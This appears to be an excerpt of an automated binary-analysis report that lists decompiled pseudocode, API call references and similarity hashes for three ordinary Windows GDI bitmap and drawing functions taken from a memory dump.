SetBkColor.GDI32(00000000,00000000), ref: 0042408C
SelectObject.GDI32(00000000,00000000), ref: 0042409F
DeleteObject.GDI32(00000000), ref: 004240AB
DeleteDC.GDI32(00000000), ref: 004240C1
SelectObject.GDI32(?,00000000), ref: 004240DC
DeleteDC.GDI32(00000000), ref: 004240F8
7378B380.USER32(00000000,00000000,00424116,00000001,00000000,?,00000000,00000000,0042410F,?,00000000,?,?), ref: 00424109

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$Object$Select$Delete$A590B150B410Color$737997A410B380
String ID:
API String ID: 2769308743-0
Opcode ID: 128d66ff8636967e8323bc944014962b849494cb92d13c9dc30956ab23de2638
Instruction ID: b272bdfb076349d32791c8da0b54aed61b5c62d759d74d295c031d203ea9bad8
Opcode Fuzzy Hash: 128d66ff8636967e8323bc944014962b849494cb92d13c9dc30956ab23de2638
Instruction Fuzzy Hash: 65512171F00228ABDB10EBE9DC45FAEB7FCEB48704F51446AB605F7281D67C99508B58

Uniqueness

Uniqueness Score: -1.00%

Function 00424D70, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00424D70(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040272C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42528d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x425260);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403584(1);
						if(_a4 == 0) {
							E00402EC8( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E00416710(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t251 = _v64;
					E00402EC8(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E0042051C();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E004166A0(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E004207AC( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E004166A0(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E004207CC( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00420A74(_v32);
				}
				_push(0);
				L00406E30();
				_v16 = E0042063C(_t160);
				_push(_t323);
				_push(0x4251db);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x471514 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00406A68();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B2D0(_t245, _t257, _t317, _t321);
							} else {
								E0042051C();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E004166A0(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x4251aa;
						 *[fs:eax] = _t290;
						_push(0x4251e2);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407090();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040272C(_t321);
					_push(_t323);
					_push(0x425143);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E004166A0(_v12, _t321, _v24);
					_push(_v16);
					L00406A60();
					_v20 = E0042063C(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00406A58();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00420D2C(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00406BD8();
						_v56 = _t204;
						_push(_v20);
						L00406BA8();
					}
					_push(_t323);
					_push(0x425117);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00406A70();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B2D0(_t245, _t263, _t317, _t321);
						} else {
							E0042051C();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42511e);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00406BD8();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x00424d70
0x00424d71
0x00424d73
0x00424d7c
0x00424d7e
0x00424d81
0x00424d86
0x00424d8b
0x00424d90
0x00424da0
0x00424da7
0x00424daf
0x00424db1
0x00424db1
0x00424dc8
0x00424dce
0x00424dd3
0x00424dd4
0x00424dd9
0x00424ddc
0x00424de1
0x00424de2
0x00424de7
0x00424dea
0x00424df1
0x00424e50
0x00424e53
0x00424e59
0x00424e5f
0x00424e79
0x00424e80
0x00424e8f
0x00424e94
0x00424ea2
0x00424eae
0x00424eae
0x00424ebe
0x00424ece
0x00424ee2
0x00424ef1
0x00424f03
0x00424f09
0x00424f09
0x00424df3
0x00424e03
0x00424e06
0x00424e12
0x00424e17
0x00424e1d
0x00424e24
0x00424e2b
0x00424e33
0x00424e37
0x00424e37
0x00424f0c
0x00424f12
0x00424f1a
0x00424f22
0x00424f24
0x00424f24
0x00424f2d
0x00424f2f
0x00424f37
0x00424f43
0x00424f50
0x00424f55
0x00424f59
0x00424f59
0x00424f43
0x00424f37
0x00424f60
0x00424f6b
0x00424f6b
0x00424f71
0x00424f7d
0x00424f86
0x00424f98
0x00424f9e
0x00424fa0
0x00424fac
0x00424fb6
0x00424fbb
0x00424fbe
0x00424fbe
0x00424fc1
0x00424fc6
0x00424fc8
0x00424fc8
0x00424fce
0x00424fd3
0x00424fd3
0x00424fd8
0x00424fda
0x00424fe4
0x00424fe9
0x00424fea
0x00424fef
0x00424ff2
0x00424ff8
0x00424ffd
0x0042500b
0x0042514a
0x0042514c
0x00425151
0x00425152
0x00425157
0x00425158
0x0042515b
0x0042515c
0x00425161
0x00425168
0x00425177
0x00425180
0x00425179
0x00425179
0x00425179
0x00425177
0x00425187
0x0042518d
0x00425190
0x0042519b
0x004251a2
0x004251a5
0x004251c4
0x004251c7
0x004251ca
0x004251cf
0x004251d2
0x004251d3
0x004251d5
0x004251da
0x00000000
0x00000000
0x00000000
0x00425011
0x00425011
0x00425013
0x0042501d
0x00425022
0x00425023
0x00425028
0x0042502b
0x00425031
0x00425036
0x0042503e
0x0042503f
0x00425049
0x0042504c
0x0042504e
0x00425050
0x00425053
0x00425054
0x00425063
0x00425068
0x0042506e
0x00425073
0x00425075
0x00425081
0x00425084
0x00425089
0x0042508a
0x0042508d
0x0042508e
0x00425093
0x00425099
0x0042509a
0x0042509a
0x004250a1
0x004250a2
0x004250a7
0x004250aa
0x004250ad
0x004250af
0x004250b2
0x004250b6
0x004250b7
0x004250b9
0x004250ba
0x004250bd
0x004250be
0x004250c3
0x004250ca
0x004250d3
0x004250dc
0x004250d5
0x004250d5
0x004250d5
0x004250d3
0x004250e3
0x004250e6
0x004250e9
0x004250f2
0x004250f4
0x004250f9
0x004250fd
0x004250fe
0x004250fe
0x00425116
0x00425116

APIs

7378AC50.USER32(00000000,?,00000000,0042528D,?,?,?,?,?,?,00424C27,00000000,00000000,00424C3D,?,00000002), ref: 00424FDA
7378A590.GDI32(00000001,00000000,00425143,?,00000000,004251DB,?,00000000,?,00000000,0042528D,?,?), ref: 0042503F
7378A520.GDI32(00000001,00000001,00000001,00000001,00000000,00425143,?,00000000,004251DB,?,00000000,?,00000000,0042528D,?,?), ref: 00425054
SelectObject.GDI32(?,00000000), ref: 0042505E
7378B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00425143,?,00000000,004251DB,?,00000000), ref: 0042508E
7378B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00425143,?,00000000,004251DB), ref: 0042509A
7378A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00425117,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004250BE
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425117,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004250CC
7378B410.GDI32(?,00000000,000000FF,0042511E,00000000,?,00000000,00000000,00425117,?,?,00000000,00000001,00000001,00000001,00000001), ref: 004250FE
SelectObject.GDI32(?,?), ref: 0042510B
DeleteObject.GDI32(00000000), ref: 00425111

Strings

BM, xrefs: 00424E94
\"A, xrefs: 00424E6F
(, xrefs: 00424F29

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$Object$B410Select$A520A590B150DeleteErrorLast
String ID: ($BM$\"A
API String ID: 929566397-2049922049
Opcode ID: 91c77a580dd6a47518a23d3cfe11cbbfde1e859c29eae005f351ef8fa3dbb60f
Instruction ID: 4ec1d1a1a48779b95589b0d5f5ad82573584ea63a882b9added62f77f37c2d8c
Opcode Fuzzy Hash: 91c77a580dd6a47518a23d3cfe11cbbfde1e859c29eae005f351ef8fa3dbb60f
Instruction Fuzzy Hash: E7D13C74F002189FDB04DFA9D885BAEBBB5EF48304F51846AE905EB391D7389850CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0046A130, Relevance: 23.0, APIs: 15, Instructions: 468
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0046A130(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				void* _t325;
				void* _t345;
				void* _t361;
				void* _t368;
				intOrPtr _t382;
				intOrPtr _t388;
				struct HDC__* _t392;
				struct HDC__* _t393;
				struct HDC__* _t394;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr _t447;
				intOrPtr _t464;
				void* _t478;
				signed int _t486;
				void* _t491;
				void* _t493;
				void* _t495;
				intOrPtr _t496;
				void* _t506;

				_t493 = _t495;
				_t496 = _t495 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t388 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t388 != 0xffffffff) {
					L24:
					return _t388;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t486 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t491 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t503 =  *0x471ce0;
							if( *0x471ce0 == 0) {
								 *0x471ce0 = E00469E24(1);
							}
							_t382 =  *0x471ce0; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E00469E98(_t382, _t491, _t486);
						}
						_v16 = E00424120(1);
						 *[fs:eax] = _t496;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x46a6df, _t493);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E00412AB0(0, _t486, 0,  &_v44, _t491);
						E0041F7B8( *((intOrPtr*)(E004246E8(_v16) + 0x14)), _t486, 0x8000000f, _t486, _t493, _t503);
						E00423EB0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E00412AB0(0 * _t486, 1 * _t486, 0,  &_v60, _t491);
						_t209 = _v9 - 1;
						_t506 = _t209;
						if(_t506 < 0) {
							L14:
							_push( &_v60);
							_t213 = E004246E8( *((intOrPtr*)(_v8 + 4)));
							E0041FCE8(E004246E8(_v16),  &_v44, _t507, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t508 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E00469DC8( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E00469DC8( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t508);
							}
							goto L23;
						} else {
							if(_t506 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t496;
								_v24 = E00424120(1);
								_v20 = E00424120(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x46a6a3, _t493);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E0041F7B8( *((intOrPtr*)(E004246E8(_v24) + 0x14)),  *_v24, 0, _t486, _t493, __eflags);
									_t415 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E004247A4(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E0041EFCC( *((intOrPtr*)(E004246E8(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E00425598(_v24, 0);
										E0041F7B8( *((intOrPtr*)(E004246E8(_v24) + 0x14)), _t415, 0xffffff, _t486, _t493, __eflags);
									}
									E00425598(_v24, 1);
									_t391 = E004246E8(_v16);
									E0041F7B8( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x8000000f, _t486, _t493, __eflags);
									E0041FE50(_t258,  &_v44);
									E0041F7B8( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x80000014, _t486, _t493, __eflags);
									SetTextColor(E00420244(_t391), 0);
									SetBkColor(E00420244(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(1);
									_push(1);
									_push(E00420244(_t391));
									L00406A38();
									E0041F7B8( *((intOrPtr*)(_t391 + 0x14)), _t415, 0x80000010, _t486, _t493, __eflags);
									SetTextColor(E00420244(_t391), 0);
									SetBkColor(E00420244(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(E00420244(_t391));
									L00406A38();
								} else {
									_v28 = E004246E8(_v16);
									E004246E8(_v20);
									E0041FCE8(_v28,  &_v44, __eflags,  &_v60);
									E00425598(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E0041F7B8( *((intOrPtr*)(E004246E8(_v20) + 0x14)),  *_v24, 0xffffff, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E004246E8(_v20));
									_t325 = E004246E8(_v24);
									_pop(_t421);
									E0041FCE8(_t325,  &_v44, __eflags);
									E0041F7B8( *((intOrPtr*)(_v28 + 0x14)), _t421, 0x80000014, _t486, _t493, __eflags);
									_t392 = E00420244(_v28);
									SetTextColor(_t392, 0);
									SetBkColor(_t392, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t392);
									L00406A38();
									E0041F7B8( *((intOrPtr*)(E004246E8(_v20) + 0x14)), _t421, 0x808080, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E004246E8(_v20));
									_t345 = E004246E8(_v24);
									_pop(_t422);
									E0041FCE8(_t345,  &_v44, __eflags);
									E0041F7B8( *((intOrPtr*)(_v28 + 0x14)), _t422, 0x80000010, _t486, _t493, __eflags);
									_t393 = E00420244(_v28);
									SetTextColor(_t393, 0);
									SetBkColor(_t393, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t393);
									L00406A38();
									_push(E0041EB0C( *((intOrPtr*)(_v8 + 0x1c))));
									_t361 = E004246E8(_v20);
									_pop(_t478);
									E0041F7B8( *((intOrPtr*)(_t361 + 0x14)), _t422, _t478, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E004246E8(_v20));
									_t368 = E004246E8(_v24);
									_pop(_t423);
									E0041FCE8(_t368,  &_v44, __eflags);
									E0041F7B8( *((intOrPtr*)(_v28 + 0x14)), _t423, 0x8000000f, _t486, _t493, __eflags);
									_t394 = E00420244(_v28);
									SetTextColor(_t394, 0);
									SetBkColor(_t394, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420244(E004246E8(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t394);
									L00406A38();
								}
								__eflags = 0;
								_pop(_t464);
								 *[fs:eax] = _t464;
								_push(0x46a6aa);
								E004035B4(_v20);
								return E004035B4(_v24);
							} else {
								_t507 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t447);
								 *[fs:eax] = _t447;
								_push(0x46a6e6);
								return E004035B4(_v16);
							}
						}
					}
				}
			}

0x0046a131
0x0046a133
0x0046a139
0x0046a13c
0x0046a143
0x0046a14e
0x0046a14e
0x0046a15a
0x0046a161
0x0046a6fd
0x0046a705
0x0046a167
0x0046a16f
0x0046a181
0x00000000
0x0046a187
0x0046a18f
0x0046a19b
0x0046a19e
0x0046a1ab
0x0046a1b4
0x0046a1b6
0x0046a1bd
0x0046a1cb
0x0046a1cb
0x0046a1d4
0x0046a1e1
0x0046a1e1
0x0046a1f0
0x0046a1fe
0x0046a208
0x0046a212
0x0046a220
0x0046a235
0x0046a245
0x0046a251
0x0046a25d
0x0046a25d
0x0046a276
0x0046a27e
0x0046a27e
0x0046a280
0x0046a28d
0x0046a290
0x0046a297
0x0046a2a9
0x0046a2b1
0x0046a2b4
0x0046a2b8
0x0046a2fa
0x0046a2ba
0x0046a2d6
0x0046a2d6
0x00000000
0x0046a282
0x0046a282
0x0046a305
0x0046a30a
0x0046a318
0x0046a327
0x0046a336
0x0046a344
0x0046a34e
0x0046a351
0x0046a354
0x0046a358
0x0046a541
0x0046a54b
0x0046a55b
0x0046a565
0x0046a567
0x0046a56d
0x0046a572
0x0046a574
0x0046a586
0x0046a58b
0x0046a590
0x0046a5a5
0x0046a5a5
0x0046a5af
0x0046a5bc
0x0046a5c6
0x0046a5d0
0x0046a5dd
0x0046a5ec
0x0046a5fe
0x0046a603
0x0046a608
0x0046a60a
0x0046a619
0x0046a61a
0x0046a61b
0x0046a61c
0x0046a61e
0x0046a627
0x0046a628
0x0046a635
0x0046a644
0x0046a656
0x0046a65b
0x0046a660
0x0046a662
0x0046a671
0x0046a672
0x0046a673
0x0046a674
0x0046a676
0x0046a67f
0x0046a680
0x0046a35e
0x0046a366
0x0046a370
0x0046a37d
0x0046a387
0x0046a393
0x0046a39d
0x0046a3b0
0x0046a3b8
0x0046a3c1
0x0046a3c5
0x0046a3cd
0x0046a3ce
0x0046a3de
0x0046a3eb
0x0046a3f0
0x0046a3fb
0x0046a400
0x0046a405
0x0046a407
0x0046a416
0x0046a417
0x0046a418
0x0046a419
0x0046a41b
0x0046a41d
0x0046a41e
0x0046a433
0x0046a43b
0x0046a444
0x0046a448
0x0046a450
0x0046a451
0x0046a461
0x0046a46e
0x0046a473
0x0046a47e
0x0046a483
0x0046a488
0x0046a48a
0x0046a499
0x0046a49a
0x0046a49b
0x0046a49c
0x0046a49e
0x0046a4a0
0x0046a4a1
0x0046a4b1
0x0046a4b5
0x0046a4bd
0x0046a4be
0x0046a4c6
0x0046a4cf
0x0046a4d3
0x0046a4db
0x0046a4dc
0x0046a4ec
0x0046a4f9
0x0046a4fe
0x0046a509
0x0046a50e
0x0046a513
0x0046a515
0x0046a524
0x0046a525
0x0046a526
0x0046a527
0x0046a529
0x0046a52b
0x0046a52c
0x0046a52c
0x0046a685
0x0046a687
0x0046a68a
0x0046a68d
0x0046a695
0x0046a6a2
0x0046a284
0x0046a285
0x0046a287
0x00000000
0x00000000
0x0046a6c9
0x0046a6cb
0x0046a6ce
0x0046a6d1
0x0046a6de
0x0046a6de
0x0046a282
0x0046a280
0x0046a181

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33bad8e59a3afc72a6aa36e04e0b52a2b3eebe3d04c78215072205f3ab4cccd4
Instruction ID: 47c3eab816d7371ae8d8058d6e4512fc1a5e86abf49d724e198f2369b07f6b98
Opcode Fuzzy Hash: 33bad8e59a3afc72a6aa36e04e0b52a2b3eebe3d04c78215072205f3ab4cccd4
Instruction Fuzzy Hash: E0026174B001149FC700EBA9D886E9EB7F5EF49304F5140AAF805BB392CA78ED45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00424418, Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424418(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t74;
				struct HDC__* _t76;
				signed int _t78;
				signed int _t79;
				char _t80;
				void* _t87;
				struct HDC__* _t110;
				void* _t131;
				struct HDC__* _t155;
				intOrPtr* _t159;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				int* _t179;
				intOrPtr _t181;
				void* _t183;
				void* _t184;
				intOrPtr _t185;

				_t160 = __ecx;
				_t183 = _t184;
				_t185 = _t184 + 0xffffffe4;
				_t179 = __ecx;
				_v8 = __edx;
				_t159 = __eax;
				_t181 =  *((intOrPtr*)(__eax + 0x28));
				_t167 =  *0x424664; // 0xf
				E00420318(_v8, __ecx, _t167);
				E00424A88(_t159);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *((intOrPtr*)(_t181 + 0x10));
				if(_t74 != 0) {
					_push(0xffffffff);
					_push(_t74);
					_t155 =  *(_v8 + 4);
					_push(_t155);
					L00406BD8();
					_v12 = _t155;
					_push( *(_v8 + 4));
					L00406BA8();
					_v13 = 1;
				}
				_push(0xc);
				_t76 =  *(_v8 + 4);
				_push(_t76);
				L00406B00();
				_push(_t76);
				_push(0xe);
				_t78 =  *(_v8 + 4);
				L00406B00();
				_t168 = _t78;
				_t79 = _t168 * _t78;
				if(_t79 > 8) {
					L4:
					_t80 = 0;
				} else {
					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
						_t80 = 1;
					} else {
						goto L4;
					}
				}
				if(_t80 == 0) {
					if(E004247A4(_t159) == 0) {
						SetStretchBltMode(E00420244(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t183);
				_push(0x424655);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
					E00424A28(_t159, _t160);
				}
				_t87 = E004246E8(_t159);
				_t171 =  *0x424664; // 0xf
				E00420318(_t87, _t160, _t171);
				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E004246E8(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
					_pop(_t173);
					 *[fs:eax] = _t173;
					_push(0x42465c);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t110 =  *(_v8 + 4);
						_push(_t110);
						L00406BD8();
						return _t110;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t183);
					_push(0x4245ea);
					_push( *[fs:eax]);
					 *[fs:eax] = _t185;
					L00406A60();
					_v28 = E0042063C(0);
					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
